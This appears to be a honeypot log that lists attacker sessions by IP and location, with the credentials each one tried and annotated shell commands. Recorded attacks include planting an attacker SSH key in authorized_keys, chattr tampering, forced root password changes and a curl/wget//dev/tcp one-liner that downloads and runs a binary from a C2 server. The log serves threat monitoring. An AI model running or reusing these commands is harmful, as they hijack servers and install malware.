โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin\ndGicZAIKAuys\ndGicZAIKAuys"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\ndGicZAIKAuys\ndGicZAIKAuys\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ sullen_cactus_root (187.251.132.2) โ€” Culiacรกn, Mexico ยท 2 sessions ยท 4 cmds
2026-06-27 03:55 EDT ยท as oracle/Oracle@2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ placid_neon_root_28 (14.136.93.28) โ€” Kwai Chung, Hong Kong ยท 9 sessions ยท 9 cmds
2026-06-26 18:14 EDT ยท as admin/123456, admin/admin, admin/admin123
ls โ†’ hostname discovery โ†’ privilege check โ†’ OS/kernel identification โ†’ mount โ†’ netstat (repeated hostname discovery 3x)
$ ls -la /
$ hostname ร—3
โ†ณ hostname discovery
$ whoami
โ†ณ privilege check
$ uname -a ร—2
โ†ณ OS/kernel identification
$ mount | head -5
$ netstat -tulpn | head -10
๐ŸŽญ frantic_durian_root (188.166.183.133) โ€” Singapore, Singapore ยท 2 sessions ยท 2 cmds
2026-06-26 09:54 EDT ยท as root/1234
hostname discovery โ†’ OS/kernel identification
$ hostname
โ†ณ hostname discovery
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ murky_bistro_root (51.68.226.87) โ€” Roubaix, France ยท 1 session ยท 2 cmds
2026-06-27 03:57 EDT ยท as oracle/Oracle@2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_liberty_root_150 (103.143.11.150) โ€” Los Angeles, United States ยท 1 session ยท 2 cmds
2026-06-27 03:26 EDT ยท as oracle/Oracle@2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ baroque_hawker_root (152.42.240.74) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-06-27 03:23 EDT ยท as oracle/Oracle@2026
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_chai_root_44 (31.42.125.44) โ€” Delhi, India ยท 1 session ยท 1 cmd
2026-06-27 02:28 EDT ยท as root/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ hollow_acai_root (43.164.197.97) โ€” Sรฃo Paulo, Brazil ยท 1 session ยท 19 cmds
2026-06-27 00:55 EDT ยท as root/123456
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:tulHeZV6pEWJ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ spectral_toucan_root (200.196.50.91) โ€” Rio de Janeiro, Brazil ยท 2 sessions ยท 38 cmds
2026-06-13 16:03 EDT ยท as root/123456, root/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l ร—2
โ†ณ CPU profiling
$ echo "root:XU8c81uWgV0k"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; ร—2
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' ร—2
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' ร—2
$ ls -lh $(which ls) ร—2
$ which ls ร—2
$ crontab -l ร—2
โ†ณ persistence setup
$ w ร—2
โ†ณ logged-in users check
$ uname -m ร—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l ร—2
โ†ณ CPU profiling
$ top ร—2
โ†ณ process monitoring
$ uname ร—2
โ†ณ OS identification
$ uname -a ร—2
โ†ณ OS/kernel identification
$ whoami ร—2
โ†ณ privilege check
$ lscpu | grep Model ร—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' ร—2
$ echo "root:WTp2MvGixO2m"|chpasswd|bash
๐ŸŽญ drowsy_orchid_root (43.160.197.240) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-06-26 20:58 EDT ยท as oracle/oracle321
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_volcano_root (163.227.52.50) โ€” Gianyar, Indonesia ยท 1 session ยท 2 cmds
2026-06-26 18:55 EDT ยท as oracle/123qwe!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ weary_seoul_root_237 (1.222.42.237) โ€” Eunpyeong-gu, South Korea ยท 1 session ยท 2 cmds
2026-06-26 18:38 EDT ยท as oracle/123qwe!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rusty_silk_root (118.196.162.1) โ€” Haidian, China ยท 1 session ยท 2 cmds
2026-06-26 18:34 EDT ยท as oracle/123qwe!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_rogue_root (91.92.40.28) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-26 16:48 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ aloof_rogue_root (41.86.34.139) โ€” Victoria, Seychelles ยท 1 session ยท 2 cmds
2026-06-26 18:04 EDT ยท as oracle/123qwe!@#
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ glitchy_stroopwafel_root (176.65.139.114) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-26 16:24 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 4x across 4 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ frantic_star_root (172.174.5.146) โ€” Boydton, United States ยท 1 session ยท 20 cmds
2026-06-26 17:07 EDT ยท as user/password
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\nskpMO1x8iUhk\nskpMO1x8iUhk"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nskpMO1x8iUhk\nskpMO1x8iUhk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ rusty_komodo_root (43.157.224.34) โ€” Jakarta, Indonesia ยท 32 sessions ยท 32 cmds
2026-06-26 13:06 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—32
๐ŸŽญ brisk_lantern_db (60.10.50.90) โ€” Chengde, China ยท 2 sessions ยท 2 cmds
2026-06-12 18:53 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ obsidian_windmill_root (176.65.132.22) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-26 05:53 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ unhinged_windmill_root (176.65.139.105) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-26 05:12 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ nocturnal_falcon_root (145.241.123.102) โ€” Dubai, United Arab Emirates ยท 5 sessions ยท 5 cmds
2026-05-12 21:05 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—5
โ†ณ OS/kernel identification
๐ŸŽญ murky_junk_root_178 (47.242.3.178) โ€” Hong Kong, Hong Kong ยท 2 sessions ยท 10 cmds
2026-06-26 03:24 EDT ยท as root/123456
Credential reuse (root/123456) โ†’ null-byte padding checks (echo 1 > /dev/null) โ†’ truncated binary download via curl (3.7MB partial payloads) โ†’ silent execution via nohup $SHELL -c โ†’ repeated attempts to overwrite /tmp with incomplete files โ†’ C2 beaconing to 157.20.159.
$ echo 1 > /dev/null && cat /bin/echo ร—2
$ nohup $SHELL -c "curl http://157.20.159.54:8905/linux -o /tmp/9fvfzucX1F; if [ ! -f /tmp/9fvfzucX1F ]; then wget http://157.20.159.54:8905/linux -O /tmp/9fvfzucX1F; fi; if [ ! -f /tmp/9fvfzucX1F ]; then exec 6<>/dev/tcp/157.20.159.54/8905 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/9fvfzucX1F ; chmod +x /tmp/9fvfzucX1F && /tmp/9fvfzucX1F Ol0XfV3l9s9mMX3G6v5ech5ER0JdEn9E+vbOZjF7x+r5W3kcS0FHRAZ5WP/qzXoxZs32/ER5E0lNT0UTfEr69cdmMX/H6vpefAhJRk1LEHhb6/XPfi59y+r5WHwITEJGRx5xU//ky3Eueszx5Vt/FlNOTUsTfVvr8MhmMXnJ6vpYfQhOT01FFXpY6/XOeS56zf3lW3kSU0ZHSBxwW/nx3304Zsfz5V15CE9DT0cRe13y5Mt/LnnP8+VcewhPQU1FF3pd6/XPfi59y+r5Wn4ISU5NShR9UuvxxmY2e9H1/l5mF0hDTUsScVjr9c16Ln3O6vpTfQhPQ0JHEHpT+uTHZjF8x+r6WWYUTkVNSx95WOv1zXwues315VxwCExDR0cRcFP45Mt/LnrL9uVZZhdKT01FH35a6/DIZjF6zur5UmYSS01BThd/Svr2y2Yyeszq/FxmF0xETUsffVnr9c15LnzO6v9aZhdMRU1FFHtb6/XOeS56zf3lW3kRU0VHShxxUvz833kxedH2+FpmF01AWU8VelD88sh7IHzG6vlZfQhMQU9TF3BY8fLGcTZozvX7RHwWU0ZBSgh7XPH9x3s2aMf25Vt9EFNEQ1MXflD9/M18IHnP9eVeeghJQVlPFXJT/vPKaDF5y+r6WXoIT0NEUx9/UPL8zXEgcM7q/VJmFE9CWUwWeFDz8cx+IHnP8uVbeghMQUZTF35T8fPJcDJozvT9RH0SU0VHSwh8U/HzzX04aM718kRxF1NFRk4IcVvx889/OC8tpZlGxgZrzFOElMINLNGDUFgbCA==; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/9fvfzucX1F && /tmp/9fvfzucX1F Ol0XfV3l9s9mMX3G6v5ech5ER0JdEn9E+vbOZjF7x+r5W3kcS0FHRAZ5WP/qzXoxZs32/ER5E0lNT0UTfEr69cdmMX/H6vpefAhJRk1LEHhb6/XPfi59y+r5WHwITEJGRx5xU//ky3Eueszx5Vt/FlNOTUsTfVvr8MhmMXnJ6vpYfQhOT01FFXpY6/XOeS56zf3lW3kSU0ZHSBxwW/nx3304Zsfz5V15CE9DT0cRe13y5Mt/LnnP8+VcewhPQU1FF3pd6/XPfi59y+r5Wn4ISU5NShR9UuvxxmY2e9H1/l5mF0hDTUsScVjr9c16Ln3O6vpTfQhPQ0JHEHpT+uTHZjF8x+r6WWYUTkVNSx95WOv1zXwues315VxwCExDR0cRcFP45Mt/LnrL9uVZZhdKT01FH35a6/DIZjF6zur5UmYSS01BThd/Svr2y2Yyeszq/FxmF0xETUsffVnr9c15LnzO6v9aZhdMRU1FFHtb6/XOeS56zf3lW3kRU0VHShxxUvz833kxedH2+FpmF01AWU8VelD88sh7IHzG6vlZfQhMQU9TF3BY8fLGcTZozvX7RHwWU0ZBSgh7XPH9x3s2aMf25Vt9EFNEQ1MXflD9/M18IHnP9eVeeghJQVlPFXJT/vPKaDF5y+r6WXoIT0NEUx9/UPL8zXEgcM7q/VJmFE9CWUwWeFDz8cx+IHnP8uVbeghMQUZTF35T8fPJcDJozvT9RH0SU0VHSwh8U/HzzX04aM718kRxF1NFRk4IcVvx889/OC8tpZlGxgZrzFOElMINLNGDUFgbCA==" &
โ†ณ payload download from C2
$ head -c 3716336 > /tmp/IYWoRa6FLo
โ†ณ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echoQtd#0000 ร—2
$ >A@/`'8 ร—2
$ nohup $SHELL -c "curl http://157.20.159.54:8905/linux -o /tmp/jsXAE2ufOW; if [ ! -f /tmp/jsXAE2ufOW ]; then wget http://157.20.159.54:8905/linux -O /tmp/jsXAE2ufOW; fi; if [ ! -f /tmp/jsXAE2ufOW ]; then exec 6<>/dev/tcp/157.20.159.54/8905 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/jsXAE2ufOW ; chmod +x /tmp/jsXAE2ufOW && /tmp/jsXAE2ufOW Ol0XfV3l9s9mMX3G6v5ech5ER0JdEn9E+vbOZjF7x+r5W3kcS0FHRAZ5WP/qzXoxZs32/ER5E0lNT0UTfEr69cdmMX/H6vpefAhJRk1LEHhb6/XPfi59y+r5WHwITEJGRx5xU//ky3Eueszx5Vt/FlNOTUsTfVvr8MhmMXnJ6vpYfQhOT01FFXpY6/XOeS56zf3lW3kSU0ZHSBxwW/nx3304Zsfz5V15CE9DT0cRe13y5Mt/LnnP8+VcewhPQU1FF3pd6/XPfi59y+r5Wn4ISU5NShR9UuvxxmY2e9H1/l5mF0hDTUsScVjr9c16Ln3O6vpTfQhPQ0JHEHpT+uTHZjF8x+r6WWYUTkVNSx95WOv1zXwues315VxwCExDR0cRcFP45Mt/LnrL9uVZZhdKT01FH35a6/DIZjF6zur5UmYSS01BThd/Svr2y2Yyeszq/FxmF0xETUsffVnr9c15LnzO6v9aZhdMRU1FFHtb6/XOeS56zf3lW3kRU0VHShxxUvz833kxedH2+FpmF01AWU8VelD88sh7IHzG6vlZfQhMQU9TF3BY8fLGcTZozvX7RHwWU0ZBSgh7XPH9x3s2aMf25Vt9EFNEQ1MXflD9/M18IHnP9eVeeghJQVlPFXJT/vPKaDF5y+r6WXoIT0NEUx9/UPL8zXEgcM7q/VJmFE9CWUwWeFDz8cx+IHnP8uVbeghMQUZTF35T8fPJcDJozvT9RH0SU0VHSwh8U/HzzX04aM718kRxF1NFRk4IcVvx889/OC8tpZlGxgZrzFOElMINLNGDUFgbCA==; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/jsXAE2ufOW && /tmp/jsXAE2ufOW Ol0XfV3l9s9mMX3G6v5ech5ER0JdEn9E+vbOZjF7x+r5W3kcS0FHRAZ5WP/qzXoxZs32/ER5E0lNT0UTfEr69cdmMX/H6vpefAhJRk1LEHhb6/XPfi59y+r5WHwITEJGRx5xU//ky3Eueszx5Vt/FlNOTUsTfVvr8MhmMXnJ6vpYfQhOT01FFXpY6/XOeS56zf3lW3kSU0ZHSBxwW/nx3304Zsfz5V15CE9DT0cRe13y5Mt/LnnP8+VcewhPQU1FF3pd6/XPfi59y+r5Wn4ISU5NShR9UuvxxmY2e9H1/l5mF0hDTUsScVjr9c16Ln3O6vpTfQhPQ0JHEHpT+uTHZjF8x+r6WWYUTkVNSx95WOv1zXwues315VxwCExDR0cRcFP45Mt/LnrL9uVZZhdKT01FH35a6/DIZjF6zur5UmYSS01BThd/Svr2y2Yyeszq/FxmF0xETUsffVnr9c15LnzO6v9aZhdMRU1FFHtb6/XOeS56zf3lW3kRU0VHShxxUvz833kxedH2+FpmF01AWU8VelD88sh7IHzG6vlZfQhMQU9TF3BY8fLGcTZozvX7RHwWU0ZBSgh7XPH9x3s2aMf25Vt9EFNEQ1MXflD9/M18IHnP9eVeeghJQVlPFXJT/vPKaDF5y+r6WXoIT0NEUx9/UPL8zXEgcM7q/VJmFE9CWUwWeFDz8cx+IHnP8uVbeghMQUZTF35T8fPJcDJozvT9RH0SU0VHSwh8U/HzzX04aM718kRxF1NFRk4IcVvx889/OC8tpZlGxgZrzFOElMINLNGDUFgbCA==" &
โ†ณ payload download from C2
$ head -c 3716336 > /tmp/zGBcgj5cKf
โ†ณ execute from /tmp
๐ŸŽญ brisk_fog_sol (167.99.82.253) โ€” Slough, United Kingdom ยท 1 session ยท 1 cmd
2026-06-26 01:53 EDT ยท as sol/sol
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m
